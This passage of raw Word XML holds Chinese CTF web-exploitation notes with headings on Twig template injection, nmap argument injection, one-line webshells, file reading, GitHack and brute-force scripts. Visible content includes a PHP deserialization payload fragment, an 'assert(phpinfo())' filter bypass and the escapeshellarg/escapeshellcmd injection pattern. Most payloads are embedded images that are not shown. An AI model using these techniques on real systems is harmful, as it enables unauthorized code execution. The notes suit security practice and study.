          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s:7:"";s:48:";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"</w:t>
      </w:r>
    </w:p>
    <w:p>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system绕过：使用assert配合phpinfo()，即assert(phpinfo())</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快速触发desrtuct：去掉序列化尾部的}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:r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90"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266055" cy="1673860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc5620"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Twig模版注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>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91"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266690" cy="219392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92"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="2447925"/>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93"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271135" cy="25146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94"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="24631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95"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271770" cy="2456815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc20085"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十一.nmap指令漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$host = $_GET['host'];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$host = escapeshellarg($host);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$host = escapeshellcmd($host);</w:t>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc29031"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.一句话木马</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>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96"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="1123315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc4769"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.文件读取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>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97"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="755650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc624"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十二.GitHack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>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98"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5264785" cy="433070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>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99"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271135" cy="3661410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc9082"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc28202"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.PHP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>循环解码，注意根据实际修改字符串</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1035" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:50.15pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId101" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1035" DrawAspect="Content" ObjectID="_1468075735" r:id="rId100">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36" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:27.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId10" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1036" DrawAspect="Content" ObjectID="_1468075736" r:id="rId102">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1037" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:33.3pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId104" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1037" DrawAspect="Content" ObjectID="_1468075737" r:id="rId103">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1038" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:39.05pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId106" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1038" DrawAspect="Content" ObjectID="_1468075738" r:id="rId105">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc18209"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.PYTHON</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MD5前缀爆破(根据实际修改MD5字符串前缀)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1039" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:26.45pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId108" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1039" DrawAspect="Content" ObjectID="_1468075739" r:id="rId107">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc2521"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>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pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc11979"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Arjun</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>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109"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272405" cy="885190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc14040"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>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pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>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pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>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pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc16248"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十六.一些杂七杂八的打法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注意相应中可能含有提示</w:t>
      </w:r>
    </w:p>
    <w:p>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10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="249047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cookie寻找注入点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>network中js文件响应里寻找隐藏信息</w:t>
      </w:r>
    </w:p>
    <w:p>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11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269230" cy="1656080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:object>
          <v:shape id="_x0000_i1040" o:spt="75" type="#_x0000_t75" style="height:31.8pt;width:89.6pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId113" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1040" DrawAspect="Content" ObjectID="_1468075740" r:id="rId112">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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C50B26"/>
    <w:rsid w:val="00DA5202"/>
    <w:rsid w:val="00DF14BB"/>
    <w:rsid w:val="00E865C2"/>
    <w:rsid w:val="01674D52"/>
    <w:rsid w:val="03675440"/>
    <w:rsid w:val="037E2CDF"/>
    <w:rsid w:val="03A167C4"/>
    <w:rsid w:val="058F1702"/>
    <w:rsid w:val="05F41565"/>
    <w:rsid w:val="061A5470"/>
    <w:rsid w:val="061F3513"/>
    <w:rsid w:val="068F2C12"/>
    <w:rsid w:val="07320597"/>
    <w:rsid w:val="07544AAE"/>
    <w:rsid w:val="07D86379"/>
    <w:rsid w:val="08055CAB"/>
    <w:rsid w:val="084F786F"/>
    <w:rsid w:val="08EB7E5C"/>
    <w:rsid w:val="0984078A"/>
    <w:rsid w:val="098B203F"/>
    <w:rsid w:val="09F16623"/>
    <w:rsid w:val="0AAD39F1"/>
    <w:rsid w:val="0B723658"/>
    <w:rsid w:val="0BF10B5F"/>
    <w:rsid w:val="0C3D590B"/>
    <w:rsid w:val="0C4E2D33"/>
    <w:rsid w:val="0CE61730"/>
    <w:rsid w:val="0D5F0EF1"/>
    <w:rsid w:val="0D9D73D8"/>
    <w:rsid w:val="0DB22432"/>
    <w:rsid w:val="0EB8030B"/>
    <w:rsid w:val="0F4F7C58"/>
    <w:rsid w:val="0F5A5EBE"/>
    <w:rsid w:val="0FEE5277"/>
    <w:rsid w:val="10321608"/>
    <w:rsid w:val="103D55A6"/>
    <w:rsid w:val="10F03427"/>
    <w:rsid w:val="117A3266"/>
    <w:rsid w:val="12071881"/>
    <w:rsid w:val="12241610"/>
    <w:rsid w:val="1298389E"/>
    <w:rsid w:val="12DF1D46"/>
    <w:rsid w:val="149D5077"/>
    <w:rsid w:val="15451DDD"/>
    <w:rsid w:val="155B515D"/>
    <w:rsid w:val="15A5462A"/>
    <w:rsid w:val="17355BAF"/>
    <w:rsid w:val="1855733B"/>
    <w:rsid w:val="187808CE"/>
    <w:rsid w:val="188B0AE2"/>
    <w:rsid w:val="18B93FD0"/>
    <w:rsid w:val="18D45952"/>
    <w:rsid w:val="1904273E"/>
    <w:rsid w:val="191A0ACE"/>
    <w:rsid w:val="19903ACE"/>
    <w:rsid w:val="1A1E433C"/>
    <w:rsid w:val="1A3D7527"/>
    <w:rsid w:val="1B102E2A"/>
    <w:rsid w:val="1BA22ED7"/>
    <w:rsid w:val="1C09462B"/>
    <w:rsid w:val="1C862D77"/>
    <w:rsid w:val="1D26626B"/>
    <w:rsid w:val="1E432DEF"/>
    <w:rsid w:val="1E976C01"/>
    <w:rsid w:val="1F6E3CDF"/>
    <w:rsid w:val="1FAD0CAB"/>
    <w:rsid w:val="20145C0D"/>
    <w:rsid w:val="208E6D1D"/>
    <w:rsid w:val="20B9354E"/>
    <w:rsid w:val="20C53DD2"/>
    <w:rsid w:val="20E029BA"/>
    <w:rsid w:val="21C71488"/>
    <w:rsid w:val="22D708CC"/>
    <w:rsid w:val="239F21B0"/>
    <w:rsid w:val="23AE79DB"/>
    <w:rsid w:val="23F47432"/>
    <w:rsid w:val="23FE2F24"/>
    <w:rsid w:val="24107F3A"/>
    <w:rsid w:val="24ED2F79"/>
    <w:rsid w:val="254A5C25"/>
    <w:rsid w:val="25642945"/>
    <w:rsid w:val="25D7496D"/>
    <w:rsid w:val="267565CA"/>
    <w:rsid w:val="26AD77E2"/>
    <w:rsid w:val="26FF2A2D"/>
    <w:rsid w:val="27861200"/>
    <w:rsid w:val="278C61AB"/>
    <w:rsid w:val="278D456E"/>
    <w:rsid w:val="2792557E"/>
    <w:rsid w:val="2809341C"/>
    <w:rsid w:val="288A623F"/>
    <w:rsid w:val="28A44373"/>
    <w:rsid w:val="28E514B5"/>
    <w:rsid w:val="28EF40E2"/>
    <w:rsid w:val="293F5045"/>
    <w:rsid w:val="29D975C1"/>
    <w:rsid w:val="29E46B7A"/>
    <w:rsid w:val="2A6D1762"/>
    <w:rsid w:val="2AAE34D5"/>
    <w:rsid w:val="2B00706F"/>
    <w:rsid w:val="2B503E1A"/>
    <w:rsid w:val="2BBE2787"/>
    <w:rsid w:val="2BD55811"/>
    <w:rsid w:val="2BEE55D3"/>
    <w:rsid w:val="2C9F1C08"/>
    <w:rsid w:val="2CC24070"/>
    <w:rsid w:val="2CED0939"/>
    <w:rsid w:val="2D6D524F"/>
    <w:rsid w:val="2D703A18"/>
    <w:rsid w:val="2DF62D90"/>
    <w:rsid w:val="2EFC1307"/>
    <w:rsid w:val="2F462180"/>
    <w:rsid w:val="2F6B1FE9"/>
    <w:rsid w:val="300A670E"/>
    <w:rsid w:val="302C4043"/>
    <w:rsid w:val="309B5F37"/>
    <w:rsid w:val="30AB671F"/>
    <w:rsid w:val="30F33273"/>
    <w:rsid w:val="31083F93"/>
